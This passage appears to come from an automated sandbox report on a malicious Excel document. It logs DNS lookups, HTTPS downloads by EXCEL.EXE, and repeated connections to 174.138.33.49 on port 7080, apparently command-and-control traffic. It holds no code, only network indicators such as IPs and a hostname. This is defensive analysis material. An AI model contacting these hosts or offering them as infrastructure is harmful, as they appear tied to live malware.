Jul 1, 2022 11:38:29.385725021 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385756016 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385759115 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385792017 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385796070 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385832071 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385847092 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385870934 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385881901 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385910034 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385921001 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385963917 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.386030912 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.386063099 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.386116028 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.386127949 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.386159897 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.386202097 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.386217117 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.386240959 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.386281013 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.386286020 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.386320114 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.386323929 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.386358976 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.386399031 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.386413097 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.386439085 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.386439085 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.386481047 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.386485100 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.386522055 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.386526108 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.386641979 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.386806011 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.434768915 CEST | 7080 | 49178 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.487801075 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.487852097 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.487885952 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.487920046 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.487953901 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.487988949 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.487998009 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488024950 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488025904 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488039970 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488060951 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488063097 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488095999 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488128901 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488151073 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488164902 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488171101 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488199949 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488213062 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488234043 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488267899 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488270044 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488296032 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488303900 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488312960 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488338947 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488368988 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488405943 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488418102 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488450050 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488675117 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488711119 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488720894 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488730907 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488749027 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488761902 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488786936 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488821983 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488835096 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488857985 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488877058 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488893032 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488898039 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488928080 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488960981 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488961935 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.488980055 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.488997936 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.489000082 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.489032984 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.489049911 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.489063025 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.489088058 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.489111900 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.726145029 CEST | 49179 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.764928102 CEST | 49180 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.823021889 CEST | 7080 | 49179 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.823189020 CEST | 49179 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.823774099 CEST | 49179 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.867547989 CEST | 7080 | 49180 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.867702961 CEST | 49180 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.921521902 CEST | 7080 | 49179 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.943758011 CEST | 7080 | 49179 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.943792105 CEST | 7080 | 49179 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.943859100 CEST | 49179 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.943913937 CEST | 49179 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.952261925 CEST | 49179 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.956146002 CEST | 49180 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:30.053356886 CEST | 7080 | 49179 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:30.053464890 CEST | 49179 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:30.057756901 CEST | 7080 | 49180 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:30.059223890 CEST | 49179 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:30.080887079 CEST | 7080 | 49180 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:30.080940962 CEST | 7080 | 49180 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:30.080992937 CEST | 49180 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:30.081026077 CEST | 49180 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:30.088020086 CEST | 49180 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:30.192766905 CEST | 7080 | 49180 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:30.192939997 CEST | 49180 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:30.194590092 CEST | 7080 | 49179 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:30.577512980 CEST | 7080 | 49179 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:30.577600002 CEST | 49179 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:30.963711977 CEST | 49180 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:31.027255058 CEST | 7080 | 49178 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:31.027786016 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:31.102714062 CEST | 7080 | 49180 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:31.627957106 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:31.628007889 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:31.628210068 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:32.305054903 CEST | 7080 | 49180 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:32.305185080 CEST | 49180 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:32.490324020 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:32.490359068 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:32.490483999 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:33.577573061 CEST | 7080 | 49179 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:33.577599049 CEST | 7080 | 49179 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:33.577709913 CEST | 49179 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:34.030858040 CEST | 7080 | 49178 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:34.030922890 CEST | 7080 | 49178 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:34.030939102 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:34.031079054 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:35.305619955 CEST | 7080 | 49180 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:35.305645943 CEST | 7080 | 49180 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:35.305774927 CEST | 49180 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:36.385571957 CEST | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:36.385618925 CEST | 443 | 49181 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:36.385735989 CEST | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:36.386660099 CEST | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:36.386677980 CEST | 443 | 49181 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:36.709076881 CEST | 49182 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:36.709125042 CEST | 443 | 49182 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:36.709214926 CEST | 49182 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:36.710088968 CEST | 49182 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:36.710103989 CEST | 443 | 49182 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:37.004539013 CEST | 443 | 49181 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:37.004813910 CEST | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:37.017477036 CEST | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:37.017518997 CEST | 443 | 49181 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:37.017865896 CEST | 443 | 49181 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:37.017949104 CEST | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:37.022700071 CEST | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:37.022782087 CEST | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:37.022829056 CEST | 443 | 49181 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:37.022938967 CEST | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:37.022995949 CEST | 443 | 49181 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:37.297986984 CEST | 443 | 49182 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:37.298212051 CEST | 49182 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:37.314250946 CEST | 49182 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:37.314280033 CEST | 443 | 49182 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:37.314591885 CEST | 443 | 49182 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:37.314665079 CEST | 49182 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:37.322599888 CEST | 49182 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:37.322818995 CEST | 49182 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:37.322917938 CEST | 443 | 49182 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:37.323019028 CEST | 49182 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:37.323029995 CEST | 443 | 49182 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:38.272942066 CEST | 443 | 49181 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:38.273041964 CEST | 443 | 49181 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:38.273145914 CEST | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:38.273179054 CEST | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:38.273821115 CEST | 49181 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:38.273839951 CEST | 443 | 49181 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:38.350311041 CEST | 443 | 49182 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:38.350378990 CEST | 49182 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:38.350392103 CEST | 443 | 49182 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:38.350435972 CEST | 49182 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:38.351423979 CEST | 49182 | 443 | 192.168.2.22 | 180.250.21.2 |
Jul 1, 2022 11:38:38.351448059 CEST | 443 | 49182 | 180.250.21.2 | 192.168.2.22 |
Jul 1, 2022 11:38:42.040435076 CEST | 49183 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:42.142256021 CEST | 7080 | 49183 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:42.142334938 CEST | 49183 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:42.210745096 CEST | 49183 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:42.312227964 CEST | 7080 | 49183 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:42.336532116 CEST | 7080 | 49183 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:42.336554050 CEST | 7080 | 49183 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:42.336716890 CEST | 49183 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:42.367691040 CEST | 49183 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:42.472421885 CEST | 7080 | 49183 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:42.472536087 CEST | 49183 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:43.177539110 CEST | 49183 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:43.318479061 CEST | 7080 | 49183 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:43.698662043 CEST | 7080 | 49183 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:43.698770046 CEST | 49183 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:46.700102091 CEST | 7080 | 49183 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:46.700139046 CEST | 7080 | 49183 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:46.700299978 CEST | 49183 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:39:44.733766079 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:39:44.733819008 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:39:44.735954046 CEST | 49184 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:39:44.848021984 CEST | 7080 | 49184 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:39:44.848098040 CEST | 49184 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:39:44.848769903 CEST | 49184 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:39:44.958873987 CEST | 7080 | 49184 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:39:44.991076946 CEST | 7080 | 49184 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:39:44.991101980 CEST | 7080 | 49184 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:39:44.991192102 CEST | 49184 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:39:45.000533104 CEST | 49184 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:39:45.114645004 CEST | 7080 | 49184 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:39:45.114924908 CEST | 49184 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:39:45.127473116 CEST | 49184 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:39:45.269136906 CEST | 7080 | 49184 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:39:45.870299101 CEST | 7080 | 49184 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:39:45.870440006 CEST | 49184 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:39:46.700498104 CEST | 49184 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:39:46.700738907 CEST | 49179 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:40:13.691373110 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:40:13.691430092 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:40:13.692090988 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:40:13.692126989 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 1, 2022 11:37:51.848092079 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2022 11:37:51.866909981 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2022 11:37:55.161979914 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2022 11:37:55.179472923 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2022 11:37:58.588607073 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2022 11:37:58.608448029 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22 |
Jul 1, 2022 11:38:04.031855106 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8 |
Jul 1, 2022 11:38:04.051587105 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jul 1, 2022 11:37:51.848092079 CEST | 192.168.2.22 | 8.8.8.8 | 0x2d77 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jul 1, 2022 11:37:55.161979914 CEST | 192.168.2.22 | 8.8.8.8 | 0x55e7 | Standard query (0) | A (IP address) | IN (0x0001) | |
Jul 1, 2022 11:37:58.588607073 CEST | 192.168.2.22 | 8.8.8.8 | 0x22aa | Standard query (0) | A (IP address) | IN (0x0001) | |
Jul 1, 2022 11:38:04.031855106 CEST | 192.168.2.22 | 8.8.8.8 | 0xc3c1 | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jul 1, 2022 11:37:51.866909981 CEST | 8.8.8.8 | 192.168.2.22 | 0x2d77 | No error (0) | 212.98.224.29 | A (IP address) | IN (0x0001) | ||
Jul 1, 2022 11:37:55.179472923 CEST | 8.8.8.8 | 192.168.2.22 | 0x55e7 | No error (0) | 213.128.75.146 | A (IP address) | IN (0x0001) | ||
Jul 1, 2022 11:37:58.608448029 CEST | 8.8.8.8 | 192.168.2.22 | 0x22aa | No error (0) | 185.165.46.170 | A (IP address) | IN (0x0001) | ||
Jul 1, 2022 11:38:04.051587105 CEST | 8.8.8.8 | 192.168.2.22 | 0xc3c1 | No error (0) | komunitas.blog.gunadarma.ac.id | CNAME (Canonical name) | IN (0x0001) | ||
Jul 1, 2022 11:38:04.051587105 CEST | 8.8.8.8 | 192.168.2.22 | 0xc3c1 | No error (0) | 118.98.72.14 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49171 | 212.98.224.29 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-01 09:37:52 UTC | 0 | OUT | |
2022-07-01 09:37:52 UTC | 0 | IN | |
2022-07-01 09:37:52 UTC | 0 | IN | |
2022-07-01 09:37:52 UTC | 16 | IN | |
2022-07-01 09:37:52 UTC | 32 | IN | |
2022-07-01 09:37:52 UTC | 48 | IN | |
2022-07-01 09:37:52 UTC | 64 | IN | |
2022-07-01 09:37:52 UTC | 80 | IN | |
2022-07-01 09:37:52 UTC | 96 | IN | |
2022-07-01 09:37:52 UTC | 112 | IN | |
2022-07-01 09:37:52 UTC | 128 | IN | |
2022-07-01 09:37:52 UTC | 144 | IN | |
2022-07-01 09:37:52 UTC | 160 | IN | |
2022-07-01 09:37:52 UTC | 176 | IN | |
2022-07-01 09:37:52 UTC | 192 | IN | |
2022-07-01 09:37:52 UTC | 208 | IN | |
2022-07-01 09:37:52 UTC | 224 | IN | |
2022-07-01 09:37:52 UTC | 240 | IN | |
2022-07-01 09:37:52 UTC | 256 | IN | |
2022-07-01 09:37:52 UTC | 272 | IN | |
2022-07-01 09:37:52 UTC | 288 | IN | |
2022-07-01 09:37:52 UTC | 304 | IN | |
2022-07-01 09:37:52 UTC | 320 | IN | |
2022-07-01 09:37:52 UTC | 336 | IN | |
2022-07-01 09:37:52 UTC | 352 | IN | |
2022-07-01 09:37:52 UTC | 368 | IN | |
2022-07-01 09:37:52 UTC | 384 | IN | |
2022-07-01 09:37:52 UTC | 400 | IN | |
2022-07-01 09:37:52 UTC | 416 | IN | |
2022-07-01 09:37:52 UTC | 432 | IN | |
2022-07-01 09:37:52 UTC | 448 | IN | |
2022-07-01 09:37:52 UTC | 464 | IN | |
2022-07-01 09:37:52 UTC | 480 | IN | |
2022-07-01 09:37:52 UTC | 496 | IN | |
2022-07-01 09:37:52 UTC | 512 | IN | |
2022-07-01 09:37:52 UTC | 528 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49172 | 213.128.75.146 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-01 09:37:55 UTC | 539 | OUT | |
2022-07-01 09:37:55 UTC | 540 | IN | |
2022-07-01 09:37:55 UTC | 540 | IN | |
